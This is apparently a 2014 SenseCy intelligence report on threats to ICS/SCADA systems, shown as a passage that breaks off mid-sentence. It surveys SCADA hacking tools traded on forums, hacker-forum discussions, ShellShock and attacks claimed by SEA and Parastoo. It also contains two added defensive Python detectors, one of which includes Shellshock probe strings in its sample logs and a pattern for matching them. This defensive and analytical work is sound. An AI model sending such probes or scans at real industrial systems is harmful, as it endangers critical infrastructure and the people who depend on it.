
Cyber Threats to ICS/SCADA Systems

2014 SenseCy PO Box 8551, Poleg Netanya 4250711, Israel Tel +972-9-7482180 Israel info@sensecy.com

Cyber Intelligence Report: Cyber Threats to ICS/SCADA Systems
Executive Summary
Recent years have witnessed an increased awareness within the worldwide security community of
risks related to cyber attacks against critical infrastructures. ICS/SCADA systems have been a
particular cause of concern for the security community, owing to Stuxnet, Flame and other cyber
threats. As automation continues to evolve and assumes a more important role worldwide, the use
of ICS/SCADA systems is likely to increase accordingly.
In late August 2014, for example, over 300 companies in the oil and energy sector received a
warning from the Norwegian authorities regarding a large-scale hacker attack. The attack was
described as a spear-phishing attempt aimed at key personnel in the targeted companies, with the
goal of injecting a Trojan or virus into company systems.[1]
Additionally, in recent months numerous cyber security firms have conducted research into the
relatively new variants of Havex malware used to execute attacks against ICS and SCADA systems. By
attaching the malware to certain software available for download from ICS/SCADA manufacturer
websites, the attackers succeeded in compromising SCADA-related systems.[2] And in late September
2014, a new large-scale vulnerability, ShellShock, captured global attention as one of the most
prominent vulnerabilities discovered recently.
This research includes a comprehensive review of the SCADA field and recent significant incidents,
SCADA vulnerabilities and exploits. This report is based on the data collected from a variety of
sources, including cyber blogs, closed forums, platforms for uploading stolen and leaked
information, as well as social networks. These web searches focused on the key cyber arenas and
were conducted in Chinese, Russian, Persian, Arabic and English. The report is divided into three
main chapters:

Analysis of malicious tools and hacking methods
Discussions and trends on closed and password-protected forums
Reviewing SCADA-Related Cyber Incidents

[1] http://www.newsinenglish.no/2014/08/27/oil-industry-under-attack-by-hackers/
[2] http://securityaffairs.co/wordpress/26092/cyber-crime/cyber-espionage-havex.html


Table of Contents
Analysis of Malicious Tools and Hacking Methods
Brute-Force Tool for PLC Component Siemens S-7
ScadaScan Tool
PLCScan Tool
SCADA Vulnerability Assessment Online Guide
Discussions and Trends on Closed and Password-Protected Forums
Iranian Sources
Chinese Sources
Russian Sources
Arabic Sources
English Sources
SCADA-Related Cyber Incidents
New Vulnerability Poses Possible Threat to ICS and SCADA Systems
What this Means
The Syrian Electronic Army Hacks into Israeli SCADA Systems
The Syrian Electronic Army (SEA)
Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility
Parastoo
Jihadist Cyber Terror Group to Target SCADA Systems
Conclusion
Appendix 1: Brute-Force Tool Full Script
Appendix 2: Technical Indicators for the SCADA-Related Tools
Brute-Force Tool for S-7
ScadaScan
PLCScan
Appendix 3: Full Translation of Yaman Mukhaddab's Message


Analysis of Malicious Tools and Hacking Methods
SenseCy operates numerous virtual entities over a range of web platforms, such as cyber blogs,
professional forums and closed hacking forums. This research includes searches for malicious tools
and hacking methods relevant to SCADA systems. Being a hot topic, the SCADA field is a major point
of interest for many hacker groups and individual hackers.

Designated room for SCADA hacking on a hacking forum

SenseCy has identified several SCADA-oriented hacking tools, on both Iranian and Chinese hacking
forums.

Brute-Force Tool for PLC Component Siemens S-7


The first is a brute-force tool aimed at the widespread Siemens S-7 PLC components. The tool was
found on an Iranian hacking forum and is capable of executing a dictionary-based brute-force attack.
The tool analyzes captured network traffic, divides it into sub-divisions, locates specific elements and
then executes a brute-force attack on them.
SenseCy contacted Siemens representatives and informed them about this tool. We received the
following reply:


"...As a general security measure, Siemens recommends that asset owners configure the environment according
to our operational guidelines[3] in order to run the devices in a protected IT environment and to avoid
unauthorized network captures."

We respectfully suggest that you check to confirm that Siemens' operational guidelines[4] are being
followed correctly and thus safeguard yourself from this exploit.

The hacking tool as presented on the forums (left); part of its script (right)

For the full tool script, please see Appendix 1.

ScadaScan Tool
A second tool, ScadaScan, was found on a Chinese hacking forum. This tool was written by Amol
Sarwate from Qualys and is similar to the tool mentioned above. It, too, has brute-force capabilities,
along with an option to scan and locate protocols widely used in SCADA systems. The tool essentially
scans to locate Modbus and DNP protocols (over TCP). The script can be implemented as part of a
larger suite.

Screenshot of ScadaScan in action

[3] http://www.industry.siemens.com/topics/global/en/industrialsecurity/Documents/operational_guidelines_industrial_security_en.pdf
[4] Ibid.


PLCScan Tool
Another hacking tool found in the Chinese cyber arena is PLCScan. This is a scanning tool designed
to locate PLC devices based on an IP range scan. It locates the IP address and the relevant open ports
on the device. This tool supports the S7 and Modbus protocols. For technical indicators based on our
analysis of the malicious tools, see Appendix 2.
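
A defender's view of the range scanning described for ScadaScan and PLCScan, as an added example (not code from this report or from either tool): it flags any source that probes Modbus/TCP, S7 or DNP3 ports on many distinct hosts within a short window and lists which hosts answered. The port numbers are the protocols' standard TCP assignments; the record format, allowlist, thresholds and sample flows are assumptions constructed for illustration.

```python
"""Flag sources that sweep an address range for ICS ports (constructed example)."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Standard TCP ports of the protocols the report says these scanners look for.
ICS_PORTS = {502: "Modbus/TCP", 102: "S7 (ISO-TSAP)", 20000: "DNP3"}

# Assumption: hosts that legitimately poll controllers (e.g. an HMI or historian).
ALLOWED_SOURCES = {ipaddress.ip_address("10.10.0.5")}

WINDOW = timedelta(seconds=60)  # assumed sliding-window length
MIN_TARGETS = 5                 # assumed count of distinct hosts that makes a sweep

# Constructed flow records: "timestamp source destination dest-port tcp-state".
SAMPLE_FLOWS = """
2014-10-01T08:00:00 10.10.0.5 10.20.0.10 502 ESTABLISHED
2014-10-01T08:00:01 10.10.0.5 10.20.0.11 502 ESTABLISHED
2014-10-01T08:00:02 10.10.0.5 10.20.0.12 502 ESTABLISHED
2014-10-01T08:00:03 10.10.0.5 10.20.0.13 502 ESTABLISHED
2014-10-01T08:00:04 10.10.0.5 10.20.0.14 102 ESTABLISHED
2014-10-01T08:00:05 10.10.0.5 10.20.0.15 102 ESTABLISHED
2014-10-01T09:15:00 192.0.2.44 10.20.0.10 502 RESET
2014-10-01T09:15:01 192.0.2.44 10.20.0.11 502 ESTABLISHED
2014-10-01T09:15:02 192.0.2.44 10.20.0.12 502 ESTABLISHED
2014-10-01T09:15:03 192.0.2.44 10.20.0.13 502 RESET
2014-10-01T09:15:04 192.0.2.44 10.20.0.14 102 ESTABLISHED
2014-10-01T09:15:05 192.0.2.44 10.20.0.15 102 RESET
2014-10-01T10:00:00 10.30.0.9 10.20.0.11 502 ESTABLISHED
2014-10-01T11:30:00 10.30.0.9 10.20.0.12 502 ESTABLISHED
""".strip().splitlines()


def parse_flow(line):
    """Split one record of the hypothetical format used in SAMPLE_FLOWS."""
    ts, src, dst, dport, state = line.split()
    return (datetime.fromisoformat(ts), ipaddress.ip_address(src),
            ipaddress.ip_address(dst), int(dport), state)


def detect_ics_sweeps(lines, window=WINDOW, min_targets=MIN_TARGETS):
    """Return one alert per source that probes at least min_targets distinct
    hosts on ICS ports inside a single time window."""
    per_source = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport, state = parse_flow(line)
        # Only ICS ports matter here; known pollers are skipped.
        if dport in ICS_PORTS and src not in ALLOWED_SOURCES:
            per_source[src].append((ts, dst, dport, state))

    alerts = []
    for src, events in per_source.items():
        events.sort(key=lambda e: e[0])
        best, start = [], 0
        for end in range(len(events)):
            # Drop events from the left until the window spans <= `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            current = events[start:end + 1]
            # Keep the window that covers the most distinct destinations.
            if len({e[1] for e in current}) > len({e[1] for e in best}):
                best = current
        targets = {e[1] for e in best}
        if len(targets) >= min_targets:
            alerts.append({
                "source": str(src),
                "targets_probed": len(targets),
                "protocols": sorted({ICS_PORTS[e[2]] for e in best}),
                # Hosts that completed the handshake expose the service and
                # are the ones to check first.
                "responders": sorted({str(e[1]) for e in best
                                      if e[3] == "ESTABLISHED"}),
                "first_seen": best[0][0].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_ics_sweeps(SAMPLE_FLOWS):
        print(alert)
```

The allowlisted poller touches the same six controllers without raising an alert, and the slow source (two connections 90 minutes apart) stays below the threshold.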

SCADA Vulnerability Assessment Online Guide


One of our most interesting findings was an online guide titled: SCADA Vulnerability Assessment. This
guide, located on an Iranian hacking forum, is an extensive document (over 70 pages long) written in
Persian by two Iranian hackers and divided into four main chapters:

Introduction
Background of Critical Infrastructure Systems
The Different Parts in SCADA Systems
Industrial Control Systems (ICS)
Additional Background
Content Review
ICS and Critical Infrastructure
Protocol Layers Analysis
Modbus Protocol
Introduction to Fuzzing
Modbus Protocol Fuzzer
DNP3 Protocol
Security Assessment for ICS
Penetration Testing
Presenting the Devices used in our Experiments
Rapid Security Evaluation of ASATech RMU-2004 and DCM-2004
Cross Debugging and Cross Compiling
Reverse Engineering
Fuzzing Modbus TCP Protocol
Hardware Inspection
Additional Components and the Threat to Critical Systems
Example: Image of the Entire System
Security Assessment for Schneider Electric PLC
Example: Image of Firmware
Appendix 1: Proof of the Exploitability of ASATech Devices
Appendix 2: Modbus Fuzzer
Appendix 3: Virtual Portal of GSM Shield for Arduino


This guide reveals the tremendous interest in SCADA vulnerabilities and exploits, while displaying a
high level of understanding. This well-written document displays a significant degree of proficiency
on this particular subject. The structure and depth of the information, the level of detail and the
descriptions imply that a considerable amount of time was invested in it. This is without a doubt a
great guide and starting point for a beginner and even a specialist in the SCADA world.
The full document will be delivered to the client upon request.

Online guide cover

POC exploit code against ASATech Devices


Discussions and Trends on Closed and Password-Protected Forums
It is common knowledge that in recent years, SCADA has become one of the most-discussed topics in
the cyber world. This chapter reviews how SCADA-related topics are discussed in the arenas covered in
this report: Iranian, Chinese, Russian, Arabic and English.

Iranian Sources
Iran is without doubt a hotspot for SCADA enterprises, both from an academic frame of reference and
for more sinister motives, such as hacking and vulnerability exploitation. As
mentioned, some hacker forums have designated rooms for SCADA hacking discussions, while some
individual hackers are more SCADA-oriented than others. One example of such a hacker is Pouriya
Naseri, who goes by the alias NOTER, and is affiliated with the Iranian DataCoders hacker group. One
document written by Naseri is titled "Electro Hack" and it comprises three sections:

Basic Information about Electronic & Electrical Controllers

Example for an Attack (Electro Hack)

Basic Information about Vulnerability of PLC & SCADA

Introductory explanation about SCADA protocols

Introductory explanation regarding a SCADA exploit

The full document written by Naseri will be delivered to the client upon request.


Chinese Sources
Unlike hacker forums in other arenas, no dedicated rooms for SCADA were found on Chinese hacker
forums. Discussions about SCADA-related issues are usually held in rooms with general designations,
such as "Software Security". Most SCADA-related content is either translated to Chinese from
English sources or directly quoted from the official sites of the manufacturers (for example warnings
against newly uncovered vulnerabilities).

An article about the Havex virus translated from English

There are several professional Chinese sites dedicated solely to SCADA. These sites typically feature
discussion rooms, news reports, downloading areas, and articles and products for sale. In the
discussion section, separate rooms are established for various SCADA components and different
manufacturers such as Siemens, AB and Schneider. The information exchanged on these platforms is
mostly professional or educational, and the forum members occasionally share vulnerabilities as
published by the official manufacturers or by the US-CERT.

Example of different discussion rooms


Even though we did not find a Chinese hacking blog dedicated entirely to SCADA, some blogs do
publish SCADA-related articles and tools. Two of these tools were described above in the Malicious
Tools and Hacking Methods chapter:

ScadaScan

PLCScan

Russian Sources
While monitoring Russian sources, SenseCy identified mostly open source reports dealing with
SCADA vulnerabilities[5] and analyses of major incidents in the SCADA field from the last few years,
such as the Havex malware and Stuxnet.
One example of such a report was published in June 2014 by the Russian security company USSC
(Ural Center for System Security). This report reviewed the Havex Trojan for SCADA systems, relying
mostly on English sources.[6]

Screenshot from the Russian report about the Havex Trojan

In addition, we identified several closed forums dedicated to SCADA discussions addressing mostly
technical topics, rather than harmful activity. The members of these forums are professionals who
work in the industry and often discuss different aspects of ICS systems.[7]

[5] http://internetua.com/kriticseskie-uyazvimosti-v-SCADA-pozvolyauat-hakeram-polucsit-kontrol-nadpromishlennimi-sistemami
[6] http://www.ussc.ru/articles/id/19
[7] www.Asutpforum[.]ru/viewtopic.php?f=104&t=4302&start=75


A discussion from a professional SCADA forum about protecting a work station with ICS systems installed on it

It is important to note that the Russian underground is primarily devoted to financial scams that can
turn easy profits. Russian underground players appear less concerned with attacking SCADA systems
and are more interested in making a profit. While we cannot underestimate the capabilities of
Russian hackers in impairing SCADA systems, such plans would most likely not be discussed on
accessible web platforms.

Arabic Sources
Since 2013, Arab hackers have become more and more involved in the global petroleum industry. In
June 2013, the infamous hacker group AnonGhost launched a hacktivist operation titled #OpPetrol, a
cyber-campaign targeting the petroleum industry around the world. The group's official target list
includes companies such as the Saudi Arabian Aramco, British Petroleum in the U.K. and Texaco in
the U.S.

An announcement on the official AnonGhost Twitter account

The #OpPetrol operation is responsible for defacements of the websites of petroleum companies
and the leakage of valuable data such as usernames, passwords and personal details.


However, security experts are often more concerned about advanced hackers who could
compromise SCADA systems or ICS in the petroleum industry.[8]
Discussions pertaining to SCADA-related topics from Arabic sources focus on the importance of
SCADA systems and the significant damage that could result if these systems were to be
compromised in an operation like #OpPetrol.
SCADA systems are mentioned on white hat platforms as well. One such platform is a Facebook page
titled "Teaching Hack for Arabs" that promises to teach people how to hack SCADA systems and
other control systems in order to become security experts.[9]

A post from a Facebook page about teaching SCADA hacking

Another example of SCADA hacking practices is a tweet posted on December 3, 2013 by Abdulla el-Aly,
a Kuwaiti information security (IS) expert and CEO of Cyberkov Ltd. This tweet comments on
hacking SCADA as part of a course at a black hat conference. El-Aly uploaded a picture of the various
tools that he uses to hack the system.[10]

[8] https://blog.cyberkov.com/?s=%D8%B3%D9%83%D8%A7%D8%AF%D8%A7
[9] https://www.facebook.com/pages/Teaching-Hack-For-ofArabs/323714387692923?sk=app_106171216118819
[10] https://twitter.com/3bdullla/status/275698599789211648; https://twitter.com/3bdullla


Tweet by a Kuwaiti IS expert on SCADA hacking

Another forum discussion thread about SCADA was started on September 25, 2013 on the Arabic
forum Dev-Point, a platform dedicated mostly to developers' discussions. A hacker named al-Basra al-Iraqi
inquired about ways to hack SCADA systems. Another hacker called SkAnDeR X replied that he had
never heard of any hacker who had succeeded in breaching SCADA systems but he hoped that
someone would do so in the future. A third hacker named al-Safah provided detailed technical
information about SCADA systems and claimed that a simple computer with BackTrack, a Linux
distribution created for penetration testing, was insufficient for hacking a SCADA system. A hacker
named Black Ghost claimed that there were many ways to hack SCADA systems, for instance by
exploiting their vulnerabilities. He also mentioned that in 2011, a vulnerability was identified in
KingView SCADA software and exploited via Metasploit. Moreover, he claimed that SCADA systems
could be hacked by radio waves, a method requiring close proximity to the system. Another hacker
with the alias Muslim Aqeel provided a link to VUPEN Security Research's[11] "7T Interactive Graphical
SCADA Systems (IGSS) Remote Memory Corruption" from May 24, 2011.[12]
Another source for SCADA-related topics is military forums. In January 2014, a review about PLC with
an emphasis on traffic systems[13] was posted on the Arabic-Military forum.

[11] www.seclists.org/bugtraq/2011/May/168; www.vupen.com/english/research.php
[12] www.dev-point[.]com/vb/t431641.html
[13] http://www.arabic-military[.]com/t90369-topic


Screenshot of a PLC review on the Arabic-Military forum

In conclusion, the information accumulated from Arabic sources is mostly general, with references
to SCADA vulnerabilities, but with no actual tools or detailed methods for hacking SCADA systems or
endangering critical infrastructure systems.

English Sources
Throughout our research, we noticed a large variety of discussions on the topic of SCADA. Most
discussions revolved around theoretical attacks on critical infrastructures,[14] where users discussed
the implications and complexities of attacking large organizations and strictly supervised
infrastructures. Few forum threads showcased security holes discovered by forum members in
critical infrastructure software and hardware. However, most of the showcased vulnerabilities were
published by major security firms.
Critical infrastructure companies were mentioned on a platform commonly used by hackers for
leaking sensitive information and target lists.[15]

A list of IPs posted on Pastebin

On another Pastebin upload from 2013, organizers called on participants to use DDoS tools to attack
governmental and major corporate websites.[16] Several malware developers even offered their
customized DDoS tools, designed specifically to take down carefully monitored and powerful servers.

[14] http://www.garage4hackers[.]com/showthread.php?t=2431
[15] http://pastebin.com/bHvn7rwe
[16] http://pastebin.com/Bqak4Mjm


In addition to the Pastebin upload, SenseCy identified a post on a closed forum reviewing an exploit
found at a U.S. water power plant. This exploit is being offered online by the hacker who created it.
He showcased screenshots of the system interface, as well as his mail discourse with the Industrial
Control Systems Cyber Emergency Response Team (ICS-CERT), in the course of which CERT expressed
great interest in the exploit's capabilities.[17]

Screenshots of the SCADA control panels taken by the hacker as proof

One vulnerability disclosed in another discussion on this closed forum was an unauthorized access
vulnerability that affects many SCADA systems and remote Netgear. The vulnerability is used to
brute-force HTTP login panels, and its exploitation is explained in a step-by-step guide.[18]

The hacker's proof of concept for his exploitation of the vulnerability

[17] http://www.alboraaq[.]com/forum/showthread.php?t=269076
[18] http://www.alboraaq[.]com/forum/showthread.php?t=381388


SCADA-Related Cyber Incidents


New Vulnerability Poses Possible Threat to ICS and SCADA Systems
In late September 2014, ShellShock, a new large-scale vulnerability, captured global attention as one
of the most prominent vulnerabilities discovered recently.[19]
Shellshock, or Bashdoor, named after the Unix Bash shell it takes advantage of, is especially relevant for
Unix-based operating systems, such as Linux and Apple's OS X. Apple, for its part, addressed the news
about this vulnerability and clarified that the vast majority of OS X users are safe and that Apple will soon
release a security update for users who configure advanced UNIX services and might be vulnerable
to this security flaw.[20]
One of the major issues with this vulnerability, described by some as "Bigger than Heartbleed",[21] is
its possible effect on SCADA systems and ICS (Industrial Control Systems).[22] According to different
publications, much-needed security updates may not even be available for such systems running
unsupported versions of Linux. In addition, many ICSs outlive the manufacturer's recommended
lifespan.[23] Moreover, multiple firms and corporations have warned their customers of the possible
threat this new vulnerability poses, listing unpatched and vulnerable products.[24]
Other than various news items about Shellshock, SenseCy identified several references to this newly
discovered vulnerability on different hacking forums. One example is an Iranian hacking forum
where members posted detailed explanations of this vulnerability.

[19] http://www.slate.com/articles/technology/technology/2014/09/shellshock_what_you_need_to_know_about_the_bash_vulnerability.html
[20] http://www.macworld.com/article/2687826/apple-says-most-mac-users-are-safe-from-shellshock-bashbug-promises-quick-fix.html; http://krebsonsecurity.com/2014/09/apple-releases-patches-for-shellshock-bug/
[21] http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-moreopen-to-attack.html
[22] http://www.v3.co.uk/v3-uk/analysis/2372312/bash-shellshock-bug-puts-servers-scada-and-web-world-atrisk
[23] http://news.softpedia.com/news/Industrial-Control-Systems-Equipment-Difficult-to-Patch-AgainstShellshock-Bug-460061.shtml
[24] http://articles.economictimes.indiatimes.com/2014-09-27/news/54377111_1_solaris-bug-products;
http://news.softpedia.com/news/New-Remote-Code-Execution-Flaws-Found-In-Shellshock-Patched-Bash460348.shtml


Forum post detailing related scripts

What this Means


The vast majority of critical system management runs on some version of UNIX or Linux. In most
cases, it is a specially designed version and the organizations do not know how to patch it (if a patch
is even available), and in worst-case scenarios, the vendor does not provide any updates or patches for
the systems, specifically because of their uniqueness. This particular vulnerability is so fundamental
that it can provide access to critical assets with minimum effort. This powerful exploit can enable an
attacker to execute arbitrary commands on the system.
Even more worrisome is the fact that immediately following the release of Shellshock, more
implementations and variants of this vulnerability (Bash-related) were found. There are already
indications of various bots using this vulnerability. And if we take into consideration that the bug
dates back to the initial versions of Bash, we can only speculate where it will end, if at all.
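
One way to look for the bot activity mentioned above, as an added example (not from this report): it scans web-server access-log lines for the Bash function-definition prefix `() {` that Shellshock requests carry in fields a CGI handler exports as environment variables. The combined-log-format sample lines are constructed, and the whitespace-tolerant pattern and the `served` triage flag are assumptions.

```python
"""Find Shellshock-style probes in web access logs (constructed example)."""
import re
from collections import Counter
from urllib.parse import unquote

# Bash treats an environment value that starts with "() {" as a function
# definition; vulnerable versions also ran whatever followed the definition.
# Assumption: tolerate optional whitespace between the tokens.
FUNC_PREFIX = re.compile(r"\(\s*\)\s*\{")

# Combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [26/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :; }; echo probe"',
    '203.0.113.9 - - [26/Sep/2014:10:01:13 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '404 210 "() { :;}; echo probe" "Mozilla/5.0"',
    '198.51.100.23 - - [26/Sep/2014:10:02:40 +0000] '
    '"GET /index.html?q=%28%29%20%7B%20%3A%3B%20%7D%3B HTTP/1.1" '
    '200 1043 "-" "curl/7.30.0"',
    '192.0.2.77 - - [26/Sep/2014:10:03:05 +0000] "GET /hmi/login HTTP/1.1" '
    '200 2301 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    '192.0.2.78 - - [26/Sep/2014:10:03:09 +0000] "GET /docs/func() HTTP/1.1" '
    '200 90 "-" "Mozilla/5.0"',
]


def find_probes(lines):
    """Return (hits, per_ip): one dict per matching request and a Counter of
    matching requests per client address."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # unparseable line; a real pipeline would count these
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else ""
        status = int(m.group("status"))
        for field in ("request", "referer", "agent"):
            # URL-decode so percent-encoded probes are caught as well.
            if FUNC_PREFIX.search(unquote(m.group(field))):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "field": field,
                    "path": path,
                    "status": status,
                    # A served request means the handler ran; check the Bash
                    # version on that host first.
                    "served": status < 400,
                })
                per_ip[m.group("ip")] += 1
                break  # one hit per request is enough
    return hits, per_ip


if __name__ == "__main__":
    found, by_ip = find_probes(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(by_ip.most_common())
```

A hit only shows that a probe arrived; whether the host was affected depends on the Bash version behind the handler that served the request.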


The Syrian Electronic Army Hacks into Israeli SCADA Systems


On May 6, 2013, the cryptome.org website reported a successful attack by the "Syrian Electronic
Army" (SEA) on a strategic Israeli infrastructure system in Haifa. In an email sent to the website, the
attack was declared to be a warning to decision-makers in Israel, evoking alleged Israeli Air Force
(IAF) attacks on Syrian territory at the beginning of May 2013. The claim of responsibility for the
attack was accompanied by a .pdf file with screenshots substantiating the cyber attack.[25]
Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical
National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did,
however, reveal that the attackers had targeted the irrigation control system of Kibbutz Sa'ar, near
Nahariya. Control of this system would present the hacker with numerous capabilities, among which
is the destruction of the agricultural yield.

Screenshot from the PDF released by the attackers

We also noticed that the time shown on the screenshot indicated the end of April 2012. It is possible
that the system clock was incorrectly set, but it is more likely that the system was breached a year
ago and the published "Retaliatory Strike" was retained as a contingency plan for exactly such an
attack by Israel.
The Syrian Electronic Army posted a denial via its Twitter account, where it stated that it was not
behind the attack.[26] On other occasions, this Twitter account has been used as a platform for claims
of responsibility, but with this incident, the above attack is not mentioned, neither here nor on the
group's official website or forums (apart from the denial). It should be noted that there are
numerous examples of fictitious claims of responsibility intended to deflect identification of the
attacker MO (Modus Operandi) of state-sponsored hacker groups.

[25] http://cryptome.org/2013/05/sea-haifa-hack.htm, http://pastebin.com/aRCHLeRr
[26] https://twitter.com/Official_SEA12/status/332172497397088256


SEA denial on their Twitter account

This incident is another link in a chain of events demonstrating an impressive ability to locate and
exploit SCADA systems that appear to be susceptible to the Muslim hackers' skills. However, in our
view, this event is unprecedented. For the first time in public, a critical computerized infrastructure
facility on Israeli soil has been attacked, and it is extremely likely that a sovereign state is behind the
attack, declaring outright war in the cyber arena and deviating from the intelligence-gathering
plateau.

The Syrian Electronic Army (SEA)


The Syrian Electronic Army (SEA), a group of hackers working in support of Syrian President Bashar
al-Assad, first emerged in mid-2011 during the first Syrian uprisings, when it started attacking a wide
array of media outlets. Its campaign includes DDoS attacks, phishing, pro-Assad defacements and
spamming against governments, online services, and media organizations that are perceived as hostile
to the Syrian government.[27] The SEA's primary goal is to improve the Syrian government's image and
target its opponents and critics.
Notable Activities
To date, the SEA has successfully targeted Associated Press (AP), CNN, BBC, Daily Telegraph,
Financial Times, Guardian, The Washington Post, The New York Times, and more. Its most famous
operation was an announcement via AP's Twitter account according to which the White House was
bombed and President Obama injured. The tweet caused the stock market to briefly dip more than
$100 billion.[28]

[27] http://www.fireeye.com/blog/technical/cyber-exploits/2013/07/syrian-electronic-army-hacks-major-communicationswebsites.html
[28] http://www.vice.com/read/the-syrian-electronic-army-almost-crashed-the-dow-jones


The drop in the DOW Jones after the SEA's Obama tweet

In May 2013, the cryptome.org website reported a successful attack by the SEA on a strategic Israeli
infrastructure system in Haifa. Examination of the screenshots proved that the attack was authentic,
but was not aimed at a Critical National Infrastructure (CNI) like the municipal water SCADA system
in Haifa. Our research did, however, reveal that the attackers had targeted the irrigation control
system of a Kibbutz 30km north of Haifa. Nevertheless, it proves their growing capability and may
indicate cooperation between the group and other state actors in the region.
Methods of Operation
The SEA is very active on social media networks, including Twitter, Facebook, Google+, YouTube,
Instagram, Pinterest, and smartphone apps. The group also runs an official website, SEA.sy, where it
appeals for volunteers to promote and aid its cause using social media.[29] The group often sends
socially-engineered spear-phishing emails to lure the victim into opening weaponized and malicious
documents.[30]

[29] http://www.memri.org/report/en/0/0/0/0/0/0/7357.htm
[30] http://www.theregister.co.uk/2013/08/01/sea_analysis/


SEA's Twitter account (left); "Volunteering in the SEA" (right)

Summary
The SEA's exact relationship to the Syrian regime remains unclear. We believe, however, that the
group is not just working in support of the Syrian government, but rather operating under its orders
and guidance. In any case, recent months have proven that the SEA has emerged as a much more
serious threat not only to media outlets but also to government agencies, corporations and perhaps
even critical infrastructure systems around the world.
Having said that, it is important to emphasize that currently the group does not have the capabilities
to cause the damage that nation-state actors like China, Russia and even Iran hold.
In a scenario involving an American strike on Syria, we expect that the SEA will retaliate and wage,
perhaps with the help of state-sponsored Iranian hacker groups, cyber attacks against U.S. and
Western targets, such as media organizations, financial institutions, government entities and critical
infrastructure systems.


Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility
On January 2, 2014, the Cryptome.org website (a digital library host) published a message from the
Iranian hacker group "Parastoo", directed at the American authorities. The message headline
connects the group to a "military-style" attack on an electric power station, the PG&E Metcalf
substation, in California, U.S.A. on April 16, 2013. The connection to the Iranian group is unclear,
despite the fact that Parastoo has mentioned that it has been testing national critical infrastructures
using cyber vectors.31

Cryptome message

On April 16, 2013, an undetermined number of individuals breached the PG&E Metcalf power
substation in California and cut the fiber-optic cables in the area around the station. The act
neutralized some local 911 services and temporarily disrupted cell phone service in the area. The
perpetrators also fired shots from high-powered rifles at several transformers in the facility. Ten
were damaged and several others shut down.
Despite the fact that the attack is being treated as vandalism, the FBI has taken over the case. There
appears to have been some initial concern, or at least interest, in the fact that the shooting occurred
one day after the Boston Marathon attacks. But according to the FBI, there is no evidence at this
time relating the attack to terrorism.32

31 http://cryptome.org/2014/01/parastoo-pge-metcalf.htm
32 http://complex.foreignpolicy.com/posts/2013/12/24/power-station-militaryassault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigatesmilitary-style-attack-California-power-station.html

It should be noted that there have been several attacks against different infrastructure facilities in
the U.S. in the past year, such as the Arkansas power grid. Furthermore, officials conceded that the
electric power industry is focusing on the threat of cyber attacks.33

Parastoo
The Iranian hacker group Parastoo34 first emerged on November 25, 2012, when they posted a
message announcing they hacked into the International Atomic Energy Agency (IAEA) and leaked
personal details of its officials.35
In February 2013, Parastoo claimed to have stolen nuclear information, credit card information, and
the personal identities of thousands of customers, including individuals associated with the U.S.
military, that work with IHS Inc., a global information and analytics provider.36

Operation Roohollah: Parastoo claims to have hacked into IHS Inc.

In March 2013, several weeks prior to an April 7 anti-Israeli cyber operation, Parastoo announced
that they would demonstrate "a new generation of APT on political, social, financial cyber entities"
during the upcoming #OpIsrael campaign.37 The campaign itself included mostly DDoS, defacement
and SQLi attacks on official and private Israeli websites. We have found no evidence that APT
tools were used during this cyber operation.

33 http://complex.foreignpolicy.com/posts/2013/12/24/power-station-militaryassault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigatesmilitary-style-attack-California-power-station.html, http://www.nytimes.com/2013/10/09/us/power-grid-isattacked-in-arkansas.html?_r=0
34 Parastoo means swallow (the bird) in Persian.
35 http://cryptome.org/2012/11/parastoo-hacks-iaea.htm, http://pastebin.com/SdYaPUwr
36 http://cryptome.org/2013/02/parastoo-janes-cbrn.htm, http://freebeacon.com/anti-israel-hackingcollective-strikes-again/, http://wikileak.ir/en/leaks/13
37 http://cryptome.org/2013/03/parastoo-mt-apt.htm

On July 3, 2013, Parastoo claimed to have launched a UAV flight on U.S. soil.38 Several days later,
they published a short, mysterious video allegedly documenting a UAV watching a U.S.
aircraft carrier.39

We do not have any information regarding the members of the group, but we believe this to be an
anti-American and anti-Israeli hacker group, likely supported by the Iranian regime like other Iranian
groups.

Jihadist Cyber Terror Group to Target SCADA Systems


On June 11, a prominent Web Jihadist from the Shumukh al-Islam forum, Yaman Mukhaddab,
launched a campaign to recruit male and female volunteers for a new Electronic Jihad group. The
campaign, which takes place over the thread itself, begins with a clear definition of the group's tasks
and priorities. Mukhaddab says:40
Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel
powers, specifically the U.S., the U.K. and France, no others. This base is not going to attack,
for instance, the sites of Shia, Christians, apostates, slanderers, liar sites and forums or
anything else. I repeat: it will only target the U.S., the U.K. and France.

38 http://cryptome.org/2013/07/parastoo-uav-launch2.htm
39 http://www.hongpong.com/archives/2013/07/07/mysterious-parastoo-apparent-iranian-hacker-groupclaims-uav-flight-inside-usa-r, http://www.youtube.com/watch?v=lmuScdQPMFc&feature=player_embedded
40 See Appendix 3 for a full translation of Mukhaddab's message.

Mukhaddab goes on to list the main targets for future attacks. SCADA systems are ranked as a top
